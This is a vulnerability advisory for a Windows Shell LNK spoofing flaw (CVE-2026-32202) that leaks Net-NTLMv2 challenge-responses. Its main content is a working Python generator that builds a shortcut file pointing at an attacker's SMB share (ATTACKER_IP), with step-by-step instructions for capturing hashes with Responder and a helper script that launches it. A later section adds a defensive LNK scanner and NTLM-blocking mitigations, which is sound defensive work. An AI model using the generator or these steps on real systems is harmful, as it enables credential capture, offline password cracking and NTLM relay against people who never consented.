Windows Shell LNK Spoofing / NTLMv2 Hash Capture

27 May 2026. Reported by nu11secur1ty. Source: packetstorm (packetstorm.news).

Windows Shell LNK spoofing leaks NTLMv2 challenge-responses (Net-NTLMv2) when a folder containing a malicious UNC-targeted .lnk is viewed in File Explorer.

# Title: CVE-2026-32202 - Windows Shell LNK Spoofing to NTLMv2 Hash Capture
# Author: nu11secur1ty
# Date: 2026-05-27
# Vendor: Microsoft
# Software: Windows Shell (File Explorer)
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2026-32202
    
## Description:
A spoofing vulnerability in Windows Shell (File Explorer) lets an attacker
capture NTLMv2 challenge-responses from a victim who never clicks the
shortcut. A crafted .lnk (shortcut) file carries a UNC path pointing to an
attacker-controlled SMB server; when the folder containing the .lnk file is
rendered in File Explorer, the shell resolves that path and Windows
automatically opens an SMB session and authenticates, sending the user's
NTLMv2 response to the attacker. Browsing to the folder is all the
interaction the attack needs.

What is captured is the Net-NTLMv2 challenge-response, not the NT hash: it
can be cracked offline to recover the user's password, or relayed to another
service that accepts NTLM authentication without signing.

**CVSS**: 4.3 (Medium) – Net-NTLMv2 hash leak
**Attack Vector**: Network (SMB)
**Privileges Required**: None (the user only needs to open the folder)
**User Interaction**: None beyond browsing the folder (no click on the shortcut)

**Affected Versions**:
- Windows 11 23H2, 24H2, 25H2, 26H1
- Windows 10 21H2-22H2
- Windows Server 2019/2022/2025

**Patch**: Microsoft April 2026 Patch Tuesday (KB2026-04214)

STATUS: MEDIUM - HIGH / Vulnerability
    
[+]Payload:

```
What the attacker's SMB listener receives:
SMB2 Session Setup carrying an NTLMSSP AUTHENTICATE message (the NTLMv2 challenge-response)
UNC Path:  \\ATTACKER_IP\share\payload.dll   (the generator below uses \\ATTACKER_IP\share\test)
Protocol:  SMB2 (TCP port 445)
Hash Type: Net-NTLMv2
```
[+]Exploit:

```
#!/usr/bin/env python3
"""
CVE-2026-32202 LNK Exploit Generator
Author: nu11secur1ty
Generates an LNK file whose name and working directory point at an
attacker-controlled UNC path, so that File Explorer authenticates to the
attacker's SMB listener (Responder/Impacket) when the containing folder
is rendered.
"""

import os
import struct
import sys

# MS-SHLLINK LinkFlags bits used by this generator
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_NAME = 0x04
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
IS_UNICODE = 0x80

# LinkCLSID: {00021401-0000-0000-C000-000000000046}
LINK_CLSID = b'\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46'


def string_data(value):
    """MS-SHLLINK StringData field: CountCharacters (uint16) followed by
    that many UTF-16LE characters, with no NUL terminator."""
    return struct.pack('<H', len(value)) + value.encode('utf-16le')


def console_data_block(buffer=(80, 250), window=(80, 20)):
    """ExtraData ConsoleDataBlock: fixed size 0xCC, signature 0xA0000002.
    Only ScreenBufferSize and WindowSize are set; the remaining fields
    (fill attributes, font, cursor, history, color table) are left zero."""
    block = struct.pack('<IIHHHHHH', 0x000000CC, 0xA0000002,
                        0, 0,                  # FillAttributes, PopupFillAttributes
                        buffer[0], buffer[1],  # ScreenBufferSizeX / Y
                        window[0], window[1])  # WindowSizeX / Y
    return block + b'\x00' * (0xCC - len(block))


def create_malicious_lnk(attacker_ip, output_file="exploit.lnk",
                         share_name="share"):
    """
    Creates LNK file with UNC path to attacker machine
    """

    unc_path = f"\\\\{attacker_ip}\\{share_name}\\test"

    lnk = bytearray()

    # ===== HEADER (76 bytes) =====
    lnk.extend(struct.pack('<I', 0x0000004C))  # HeaderSize
    lnk.extend(LINK_CLSID)                     # LinkCLSID
    link_flags = (HAS_LINK_TARGET_ID_LIST | HAS_NAME | HAS_WORKING_DIR
                  | HAS_ARGUMENTS | IS_UNICODE)  # 0xB5
    lnk.extend(struct.pack('<I', link_flags))  # LinkFlags
    lnk.extend(struct.pack('<I', 0x00000080))  # FileAttributes (NORMAL)
    lnk.extend(struct.pack('<Q', 0))           # CreationTime
    lnk.extend(struct.pack('<Q', 0))           # AccessTime
    lnk.extend(struct.pack('<Q', 0))           # WriteTime
    lnk.extend(struct.pack('<I', 0x00001000))  # FileSize
    lnk.extend(struct.pack('<I', 0x00000000))  # IconIndex
    lnk.extend(struct.pack('<I', 0x00000001))  # ShowCommand (SW_NORMAL)
    lnk.extend(struct.pack('<H', 0x0000))      # Hotkey
    lnk.extend(b'\x00\x00')                    # Reserved1
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved2
    lnk.extend(b'\x00\x00\x00\x00')            # Reserved3
    assert len(lnk) == 0x4C

    # ===== LinkTargetIDList (parsed when the folder is rendered) =====
    # IDListSize (uint16) covers the ItemIDs plus the 2-byte TerminalID;
    # each ItemIDSize includes its own 2-byte size field.
    item_data = b'\x2e' + b'\x00' * 19         # shell folder item data (as in the original)
    item_id = struct.pack('<H', 2 + len(item_data)) + item_data
    id_list = item_id + b'\x00\x00'            # TerminalID
    lnk.extend(struct.pack('<H', len(id_list)))
    lnk.extend(id_list)

    # ===== STRING DATA (CRITICAL FOR EXPLOIT) =====
    # Spec order: NAME_STRING, RELATIVE_PATH, WORKING_DIR,
    # COMMAND_LINE_ARGUMENTS, ICON_LOCATION; only fields whose LinkFlags
    # bit is set are present.
    lnk.extend(string_data(unc_path))  # NameString (UNC path - triggers NTLM hash leak)
    lnk.extend(string_data(unc_path))  # WorkingDir (UNC path again)
    lnk.extend(string_data(""))        # CommandLineArguments (empty)

    # ===== EXTRA DATA =====
    lnk.extend(console_data_block())   # Console properties (80x250 buffer, 80x20 window)
    lnk.extend(b'\x00\x00\x00\x00')    # TerminalBlock (BlockSize < 4 ends ExtraData)

    # Save the file
    with open(output_file, 'wb') as f:
        f.write(lnk)

    return output_file, unc_path


def main():
    print(r"""
    ╔═══════════════════════════════════════════╗
    ║  CVE-2026-32202 - LNK Generator           ║
    ║  Author: nu11secur1ty                     ║
    ╚═══════════════════════════════════════════╝
    """)

    if len(sys.argv) < 2:
        print("Usage: python3 cve_2026_32202_gen.py <ATTACKER_IP> [output_file]")
        print("Example: python3 cve_2026_32202_gen.py 192.168.1.100 invoice.lnk")
        sys.exit(1)

    attacker_ip = sys.argv[1]
    output_file = sys.argv[2] if len(sys.argv) > 2 else "exploit.lnk"

    lnk_file, unc_path = create_malicious_lnk(attacker_ip, output_file)

    print("[+] Exploit ready!")
    print(f"[+] File: {lnk_file}")
    print(f"[+] UNC path: {unc_path}")
    print()
    print("[*] Next steps:")
    print("    1. Start Responder: sudo responder -I eth0 -v")
    print(f"    2. Transfer {lnk_file} to the target's Windows 11 Desktop")
    print("    3. Open Desktop in File Explorer (no click on the shortcut required)")
    print("    4. Watch Responder - the Net-NTLMv2 challenge-response will appear")
    print()

    with open("start_responder.sh", "w") as f:
        f.write("#!/bin/bash\n")
        f.write("echo \"[+] Starting Responder...\"\n")
        f.write("sudo responder -I eth0 -v\n")
    os.chmod("start_responder.sh", 0o755)
    print("[+] Helper script created: start_responder.sh")


if __name__ == "__main__":
    main()
```
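The defensive counterpart to the generator above, added here as an example and not part of the advisory or of any Microsoft tooling: a scanner that parses the MS-SHLLINK layout and reports every field of a .lnk that carries a UNC path. It deliberately goes further than the advisory's NameString/WorkingDir case and also checks the LinkInfo NetName, the relative path, arguments and icon location strings, and the EnvironmentVariableDataBlock/IconEnvironmentDataBlock extra-data blocks, because icon paths are resolved when a folder is rendered and a UNC icon location is another known way to force the same SMB authentication. The field offsets, flag bits and block signatures are taken from the MS-SHLLINK specification; `build_sample_lnk` constructs the test input inline (it is not a real-world sample), and `scan_tree` walks a directory on disk.

```python
#!/usr/bin/env python3
"""Scan .lnk files for UNC (\\\\host\\share) references that make File Explorer
open an SMB session, and therefore authenticate, when the containing folder
is rendered. Walks the MS-SHLLINK layout: header, LinkTargetIDList,
LinkInfo, StringData and the ExtraData blocks that carry paths."""
import os
import re
import struct
import sys
from typing import Dict, List, Tuple

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_FIELDS = ((HAS_NAME, "NameString"), (HAS_RELATIVE_PATH, "RelativePath"),
                 (HAS_WORKING_DIR, "WorkingDir"), (HAS_ARGUMENTS, "CommandLineArguments"),
                 (HAS_ICON_LOCATION, "IconLocation"))
# ExtraData blocks (size 0x314) holding a 260-byte ANSI + 520-byte Unicode target path
ENV_BLOCKS = {0xA0000001: "EnvironmentVariableDataBlock", 0xA0000007: "IconEnvironmentDataBlock"}
UNC_RE = re.compile(r"\\\\[^\\\s]+\\")   # "\\host\" anywhere in the value


def _string_data(buf: bytes, off: int, unicode: bool) -> Tuple[str, int]:
    """StringData: CountCharacters (uint16) then that many chars, no NUL terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    width = 2 if unicode else 1
    raw = buf[off:off + count * width]
    text = raw.decode("utf-16le", "replace") if unicode else raw.decode("latin-1")
    return text, off + count * width


def _link_info_netname(buf: bytes, off: int) -> Tuple[str, int]:
    """Return the CommonNetworkRelativeLink NetName (\\\\server\\share) if the
    LinkInfo has one, plus the offset just past the LinkInfo structure."""
    size, _hdr_size, flags = struct.unpack_from("<III", buf, off)
    netname = ""
    if flags & 0x2:  # CommonNetworkRelativeLinkAndPathSuffix
        (cnrl_off,) = struct.unpack_from("<I", buf, off + 20)   # CommonNetworkRelativeLinkOffset
        cnrl = off + cnrl_off
        (netname_off,) = struct.unpack_from("<I", buf, cnrl + 8)  # NetNameOffset
        raw = buf[cnrl + netname_off:]
        netname = raw[:raw.index(b"\x00")].decode("latin-1")
    return netname, off + size


def _extra_data_paths(buf: bytes, off: int) -> List[Tuple[str, str]]:
    """Collect (block name, target path) from every path-carrying ExtraData block."""
    found = []
    while off + 8 <= len(buf):
        size, sig = struct.unpack_from("<II", buf, off)
        if size < 4:  # TerminalBlock
            break
        if sig in ENV_BLOCKS and size == 0x314:
            ansi = buf[off + 8:off + 268].split(b"\x00", 1)[0].decode("latin-1")
            uni = buf[off + 268:off + 788].decode("utf-16le", "replace").split("\x00", 1)[0]
            found.append((ENV_BLOCKS[sig], ansi or uni))
        off += size
    return found


def scan_lnk(buf: bytes) -> Dict[str, str]:
    """Return {field: value} for every LNK field that holds a UNC path."""
    if len(buf) < 0x4C or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    off, fields = 0x4C, {}
    if flags & HAS_LINK_TARGET_ID_LIST:
        (idlist_size,) = struct.unpack_from("<H", buf, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:
        netname, off = _link_info_netname(buf, off)
        if netname:
            fields["LinkInfo.NetName"] = netname
    for bit, name in STRING_FIELDS:
        if flags & bit:
            fields[name], off = _string_data(buf, off, bool(flags & IS_UNICODE))
    fields.update(_extra_data_paths(buf, off))
    return {k: v for k, v in fields.items() if UNC_RE.search(v)}


def build_sample_lnk(target: str, icon_env: bool = False) -> bytes:
    """Constructed test input (not a real-world sample): a minimal Unicode LNK whose
    NameString and WorkingDir carry `target`, optionally plus an IconEnvironmentDataBlock."""
    hdr = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_NAME | HAS_WORKING_DIR | IS_UNICODE)
    uni = target.encode("utf-16le")
    body = (struct.pack("<H", len(target)) + uni) * 2
    extra = b""
    if icon_env:
        extra = (struct.pack("<II", 0x314, 0xA0000007)
                 + target.encode("latin-1").ljust(260, b"\x00") + uni.ljust(520, b"\x00"))
    return hdr.ljust(0x4C, b"\x00") + body + extra + b"\x00\x00\x00\x00"  # TerminalBlock


def scan_tree(root: str) -> Dict[str, Dict[str, str]]:
    """Map each .lnk under `root` to its UNC-bearing fields (empty dict = clean)."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".lnk"):
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    try:
                        report[path] = scan_lnk(fh.read())
                    except ValueError:
                        pass
    return report


if __name__ == "__main__":
    for path, hits in scan_tree(sys.argv[1] if len(sys.argv) > 1 else ".").items():
        for field, value in hits.items():
            print(f"{path}: {field} -> {value}")
```

Run it against a Downloads folder, a mail-attachment quarantine or a share that untrusted users can write to; any hit pointing outside the organisation's own servers deserves a look. The scanner only finds the shortcut, so pair it with the controls that stop the authentication itself: deny outbound TCP 445 at the egress firewall, set the policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny all with an allow-list of internal servers, and on Windows 11 24H2 / Server 2025 enable SMB client NTLM blocking with `Set-SmbClientConfiguration -BlockNTLM $true`.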
    
    
Demo:
https://www.patreon.com/posts/cve-2026-32202-159362448

Code:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2026/CVE-2026-32202

Time spent:
02:30:00

--
